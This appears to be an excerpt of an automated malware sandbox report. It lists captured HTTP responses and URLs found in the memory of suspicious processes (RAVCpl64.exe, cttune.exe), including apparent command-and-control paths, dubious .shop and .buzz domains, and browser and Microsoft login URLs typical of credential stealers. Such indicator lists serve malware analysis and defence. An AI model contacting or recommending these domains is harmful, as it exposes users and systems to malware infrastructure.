                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:55:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:55:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Thu, 12 Dec 2024 20:56:33 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Thu, 12 Dec 2024 20:56:36 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Thu, 12 Dec 2024 20:56:39 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Thu, 12 Dec 2024 20:56:41 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:57:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://www.inbulkses.shop/wp-json/>; rel="https://api.w.org/"Vary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aL427pSCaGiXon%2BNbZQR5BOTl6VHcTdEe4J8qM27KYpoleezZJx4kaz6VaFPhpZmC6YXViNc%2Br1UMdk5Eexd1%2BTpPQqUaBveAisk58GnhH35QocY1lI9d0O9dVTxVd6uHWT%2BM1s%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f10a0f41bfd7bd0-ATLalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=114105&min_rtt=114105&rtt_var=57052&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=384&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Ascii: 7c9a<!DOCTYPE html><html lang="en-US" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /><link rel="profile" href="http:
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 12 Dec 2024 20:57:57 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-12T20:58:02.2635220Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:58:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AXHEKA1dPN3EQEVTjcac%2Bg%2BBetujXOLh3AFwT0PWbgmAo0eqzHKnRP9wBcPNV1IWwbnSand4F1IgHf1Zp312WjzJgPnvOUh26Lmh0g9ago2HO2pOr92MBTxW4vM51PitNhH5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f10a231ebfdb0cf-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=114529&min_rtt=114529&rtt_var=57264&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=644&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:58:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rWyklwtTKzJeSATVvAr8be2jmCSNT7QKNIvkJ8jMC%2BwyUmMbhQa7jT0uQUPp21%2FZ3CXnAsL7idT7CbEpwC9n8fTye2NJGsOiLEYoxP4mjoSiIEU8KJ6VIg%2BotUWUTNVO%2BIcg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f10a2426a9d6747-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=113978&min_rtt=113978&rtt_var=56989&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=664&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:58:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fPFmB9TyUHDvEO3SsOWw2MxH17SLqb9DQSlrhW78cCYwmTtGhRbeiayXshP38wSwyYJb9a7kPsJiHqj4sCatiDgyUNPABMrIRTeTrL9ddtZr7xTLLqOlU%2BqVW4d8b%2Fb%2BZYLu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f10a252ed3bbfa0-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=114262&min_rtt=114262&rtt_var=57131&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7813&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:58:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vskf4lkCHeII0L%2B2FQp4QBUzM9ZlPEIp%2BfLNuJt%2FIiAxjKtjkUTY7kpqvSaFYNmfUcuUX74z4EDJ7K%2BOk74FhN6SK3JnqlLOKt9Dq6I%2BsG4gOk0Ihxkc%2B3sDp4eq2O%2Bq%2Fg7Q"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f10a2636a2553da-ATLalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=114177&min_rtt=114177&rtt_var=57088&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=382&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Ascii: 5cb<script type="text/javascript"> gowechat(); function gowechat() { var ua = navigator.userAgent; var isWeixin = ua.indexOf('MicroMessenger') > -1; // if (isWeixin) {window.location.href = 'https://site.ip138.com/www.jyshe18.buzz'; // } }</script><script type="text/javascript"> goqqllq(); function goqqllq() { var ua = navigator.userAgent; var isqqllq = ua.indexOf('QQ
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Dynamic Http ServerX-Ratelimit-Limit: 101X-Ratelimit-Remaining: 100X-Ratelimit-Reset: 1Date: Thu, 12 Dec 2024 20:58:51 GMTContent-Length: 0Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Dynamic Http ServerX-Ratelimit-Limit: 101X-Ratelimit-Remaining: 100X-Ratelimit-Reset: 1Date: Thu, 12 Dec 2024 20:58:53 GMTContent-Length: 0Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Dynamic Http ServerX-Ratelimit-Limit: 101X-Ratelimit-Remaining: 100X-Ratelimit-Reset: 1Date: Thu, 12 Dec 2024 20:58:56 GMTContent-Length: 0Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Dynamic Http ServerX-Ratelimit-Limit: 101X-Ratelimit-Remaining: 100X-Ratelimit-Reset: 1Date: Thu, 12 Dec 2024 20:58:59 GMTContent-Length: 0Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:59:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:59:20 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:59:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:59:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/themes/elessi-theme/assets/images/404.png
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/themes/elessi-theme/assets/js/min/functions.min.js
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/themes/elessi-theme/assets/js/min/handlebars.min.js
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/themes/elessi-theme/assets/js/min/js-large.min.js
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/themes/elessi-theme/assets/js/min/main-async.min.js
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/themes/elessi-theme/assets/js/min/main.min.js
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/themes/elessi-theme/assets/js/min/nasa-quickview.min.js
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/themes/elessi-theme/assets/js/min/typeahead.bundle.min.js
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/themes/elessi-theme/assets/minify-font-icons/fonts.min.css?ver=
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/themes/elessi-theme/style-elementor.css
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/themes/elessi-theme/style.css?ver=6.7.1
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/uploads/2017/11/payment-icons.png
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/uploads/elementor/css/post-12.css?ver=1733888755
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/uploads/elementor/css/post-3701.css?ver=1733888755
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/uploads/elementor/css/post-3715.css?ver=1733888756
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-content/uploads/woocommerce-placeholder-350x350.png
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-includes/css/dist/block-library/style.min.css?ver=6.7.1
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-includes/js/underscore.min.js?ver=1.13.7
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-includes/js/wp-util.min.js?ver=6.7.1
                Source: cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-json/
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/wp-login.php?action=logout&amp;redirect_to=http%3A%2F%2Fwww.inbulkses.shop
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/xmlrpc.php
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.inbulkses.shop/xmlrpc.php?rsd
                Source: svchost.exe, 00000005.00000002.2811721108.0000019712AA3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2811942456.0000019712B05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                Source: RAVCpl64.exe, 0000000C.00000002.6024252717.00000000006C6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sob.rip
                Source: RAVCpl64.exe, 0000000C.00000002.6024252717.00000000006C6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sob.rip/tp8k/
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007D3C000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005A8C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://yes.3.cloudflareip.com/3d/index.php?www.jyshe18.buzz
                Source: cttune.exe, 0000000D.00000003.1644119779.0000000007C22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
                Source: cttune.exe, 0000000D.00000003.1644119779.0000000007C22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdn.shopify.com/s/files/1/0522/1505/4491/files/4lbw.jpg?v=1712601664
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdn.shopify.com/s/files/1/0522/1505/4491/files/8ozsleeve.png?v=1711659498
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdn.shopify.com/s/files/1/0522/1505/4491/products/1RedTkKO3lsX1kHMcPLNDRDmkrX7htRTW.jpg?v=16
                Source: --cG1-69-.13.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: cttune.exe, 0000000D.00000003.1647938408.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1644119779.0000000007C22000.00000004.00000020.00020000.00000000.sdmp, --cG1-69-.13.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: --cG1-69-.13.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Jost%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Jost%3A300%2C300italic%2C400%2C400italic%2C500%2C500italic%2
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/
                Source: qmgr.db.5.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                Source: cttune.exe, 0000000D.00000003.1644119779.0000000007C22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: cttune.exe, 0000000D.00000003.1639379127.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5164151299.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1639379127.0000000000A74000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1639379127.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5164151299.0000000000A9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                Source: cttune.exe, 0000000D.00000003.1639379127.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1639379127.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5164151299.0000000000A9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
                Source: cttune.exe, 0000000D.00000003.1639379127.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
                Source: cttune.exe, 0000000D.00000003.1639379127.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1639379127.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5164151299.0000000000A9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
                Source: qmgr.db.5.drString found in binary or memory: https://msftspeechmodelsprod.azureedge.net/SR/SV10-EV100/en-us-n/MV101/naspmodelsmetadata.xmlPC:
                Source: svchost.exe, 00000005.00000002.2811721108.0000019712AA3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2811942456.0000019712B05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                Source: cttune.exe, 0000000D.00000002.5164151299.0000000000A5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
                Source: cttune.exe, 0000000D.00000002.5164151299.0000000000A5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
                Source: cttune.exe, 0000000D.00000003.1638432062.0000000007C11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://ogp.me/ns#
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://rankmath.com/
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://schema.org
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007D3C000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005A8C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://site.ip138.com/www.jyshe18.buzz
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
                Source: RAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
